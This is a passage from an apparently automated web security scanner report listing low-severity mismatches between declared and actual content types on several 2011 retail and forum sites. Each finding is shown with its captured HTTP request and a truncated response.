Severity:	Information
Confidence:	Firm
Host:	http://webassets.scea.com
Path:	/pscomauth/groups/public/documents/webasset/psn_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /pscomauth/groups/public/documents/webasset/psn_favicon.ico HTTP/1.1
Host: webassets.scea.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:26:59 GMT
Expires: Sun, 15 May 2011 01:30:11 GMT
Last-Modified: Mon, 25 Oct 2010 21:48:45 GMT
Cache-Control: max-age=3600
Content-Type: text/plain; charset=UTF-8
ETag: "abb35ab-1536-49377f4d78940"
Accept-Ranges: bytes
Server: Level-3 Origin Storage/1.5
Content-Length: 5430

............ .h...&... .... .........(....... ..... .....@.............................................................................................................................................
...[SNIP]...

30.24. http://wow.weather.com/weather/wow/module/USNY0400 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wow.weather.com
Path:	/weather/wow/module/USNY0400

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478&proto=http:&target=wx_module HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

30.25. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

30.26. http://www.fingerhut.com/assets/f/misc/bkgicon.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/assets/f/misc/bkgicon.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /assets/f/misc/bkgicon.jpg HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; __g_c=w%3A1%7Cb%3A3%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3A%7Cg%3A1; JSESSIONID=3062B61ACC36E77F00F87C6AAF1929B8; mbox=session#1305509219944-478846#1305511302|PC#1305509219944-478846.17#1308101442|check#true#1305509502; bn_u=6923549102649626308; fsr.a=1305509446479; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 15 May 2011 23:00:01 GMT
Accept-Ranges: bytes
Content-Length: 741
Content-Type: image/jpeg
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:30:47 GMT
Date: Mon, 16 May 2011 01:30:47 GMT
Connection: close

GIF89a..+...............................................................................................................................................................................................
...[SNIP]...

30.27. http://www.fingerhut.com/fingerhut/assets/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/fingerhut/assets/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fingerhut/assets/images/favicon.ico HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; JSESSIONID=D72D76D199D046C6C6BCB2B5665DF71D; mbox=check#true#1305509280|session#1305509219944-478846#1305511080|PC#1305509219944-478846.17#1308101225; s_cc=true; s_sq=%5B%5BB%5D%5D; isvtid_ets=1305509228072; IS3_History=0-0-0____; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; bn_u=6923549102649626308; __g_c=w%3A1%7Cb%3A2%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3A%7Cg%3A1; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 13:33:48 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1406
Date: Mon, 16 May 2011 01:33:55 GMT
Connection: close

..............h.......(....... ............................................W...d............|.............._..._...\ ......M...................p#..........W.......S...K....S..f...Q............w..Q...Q
...[SNIP]...

30.28. http://www.fingerhut.com/fingerhut/css/sifr-config.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/fingerhut/css/sifr-config.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /fingerhut/css/sifr-config.jsp HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; JSESSIONID=D9080B11BF5EB75E4ECE7E0CCB991804; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; __g_c=w%3A1%7Cb%3A2%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 2618
Date: Mon, 16 May 2011 01:26:50 GMT
Connection: close
Set-Cookie: JSESSIONID=348A3EFB9555B0204D12B7DA47148640; Path=/

var bellgothicbold = { src: '/fingerhut/fonts/bellgothicbold.swf' };
var bellgothic = { src: '/fingerhut/fonts/bellgothic.swf' };

//sIFR.useStyleCheck = true;
sIFR.fromLocal = true;

// Nex
...[SNIP]...

30.29. http://www.fingerhut.com/js/financial-snapshot.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/financial-snapshot.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/financial-snapshot.jsp HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; JSESSIONID=D9080B11BF5EB75E4ECE7E0CCB991804; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; __g_c=w%3A1%7Cb%3A2%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:26:58 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 5659
Date: Mon, 16 May 2011 01:26:58 GMT
Connection: close
Set-Cookie: JSESSIONID=D72D76D199D046C6C6BCB2B5665DF71D; Path=/

var financialSnapshot = function() {
   $(function() {
       financialSnapshot.init();
   });
   var _p = {

rColIndex : null,
       loadAsset : function() {
           if ( $( "#financialSnapshot" ).le
...[SNIP]...

30.30. http://www.fingerhut.com/js/persistent_cart.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/persistent_cart.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/persistent_cart.jsp HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; JSESSIONID=D9080B11BF5EB75E4ECE7E0CCB991804; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; __g_c=w%3A1%7Cb%3A2%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:26:57 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 11446
Date: Mon, 16 May 2011 01:26:57 GMT
Connection: close
Set-Cookie: JSESSIONID=6DE357D9B8BCF66530F69DEDC43193D4; Path=/

var persistentCartCommands = new Array(8);
persistentCartCommands[0] = '/checkout/universal_cart.jsp';
persistentCartCommands[1] = '/checkout/add_item_pc.cmd';
persistentCartCommands[2] = '/che
...[SNIP]...

30.31. http://www.fingerhut.com/js/sifr.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fingerhut.com
Path:	/js/sifr.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/sifr.jsp HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; JSESSIONID=D9080B11BF5EB75E4ECE7E0CCB991804; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; __g_c=w%3A1%7Cb%3A2%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=3600
Expires: Mon, 16 May 2011 02:26:50 GMT
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 29365
Date: Mon, 16 May 2011 01:26:50 GMT
Connection: close
Set-Cookie: JSESSIONID=A636DF0C0B83D07357B582B84D386F40; Path=/

/*****************************************************************************
scalable Inman Flash Replacement (sIFR) version 3, revision 436.

Copyright 2006 ... 2008 Mark Wubben, <http://nov
...[SNIP]...

30.32. https://www.fingerhut.com/fingerhut/assets/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/fingerhut/assets/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

30.33. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/fingerhut/css/sifr-config.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

30.34. https://www.fingerhut.com/js/financial-snapshot.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/js/financial-snapshot.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

30.35. https://www.fingerhut.com/js/persistent_cart.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/js/persistent_cart.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

30.36. https://www.fingerhut.com/js/sifr.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.fingerhut.com
Path:	/js/sifr.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

30.37. http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.footlocker.com
Path:	/ns/hp/css/images/FL_Collections_arrow_l.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ns/hp/css/images/FL_Collections_arrow_l.gif HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLC=web%2D23; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; NST=2011%2D05%2D15%2020%3A43%3A37; TID=5555%2D37151120432137200525561%2D0; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; cmTPSet=Y; CHOSEN_BANNER_ID=FS/$75; fcspersistslider_click_1=1; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:44:01 GMT
Connection: close

File not found.

30.38. http://www.passporterboards.com/forums/customavatars/avatar15288_4.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/customavatars/avatar15288_4.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar15288_4.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 2078
Content-Type: image/gif
Last-Modified: Sun, 14 Nov 2010 15:10:40 GMT
Accept-Ranges: bytes
ETag: "1233d319e84cb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:13 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.39. http://www.passporterboards.com/forums/customavatars/avatar17690_3.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/customavatars/avatar17690_3.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar17690_3.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 4562
Content-Type: image/gif
Last-Modified: Sun, 14 Nov 2010 15:11:01 GMT
Accept-Ranges: bytes
ETag: "c041ec25e84cb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:19 GMT

......JFIF.....H.H.....C....................................................................C.......................................................................@.@.."..............................
...[SNIP]...

30.40. http://www.passporterboards.com/forums/customavatars/avatar18759_15.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/customavatars/avatar18759_15.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar18759_15.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 2021
Content-Type: image/gif
Last-Modified: Sun, 14 Nov 2010 15:11:09 GMT
Accept-Ranges: bytes
ETag: "041fd2ae84cb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:20 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.41. http://www.passporterboards.com/forums/customavatars/avatar30289_3.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/customavatars/avatar30289_3.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar30289_3.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 1980
Content-Type: image/gif
Last-Modified: Sun, 14 Nov 2010 15:12:32 GMT
Accept-Ranges: bytes
ETag: "a2d25b5ce84cb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:14 GMT

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222222
...[SNIP]...

30.42. http://www.passporterboards.com/forums/customavatars/avatar3404_4.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/customavatars/avatar3404_4.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar3404_4.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
Content-Length: 10862
Content-Type: image/gif
Last-Modified: Sun, 14 Nov 2010 15:09:15 GMT
Accept-Ranges: bytes
ETag: "8a8bf9e6d84cb1:32df"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:21:08 GMT

......JFIF.....H.H.....?Exif..II*........... ...................................................................(...........2.......................i...........................
...[SNIP]...

30.43. http://www.passporterboards.com/forums/customavatars/avatar7184_7.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.passporterboards.com
Path:	/forums/customavatars/avatar7184_7.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /forums/customavatars/avatar7184_7.gif HTTP/1.1
Host: www.passporterboards.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=cf502231ee98020f9a3c9359f33d95e1; bblastvisit=1305508789; bblastactivity=0

Response

HTTP/1.1 200 OK
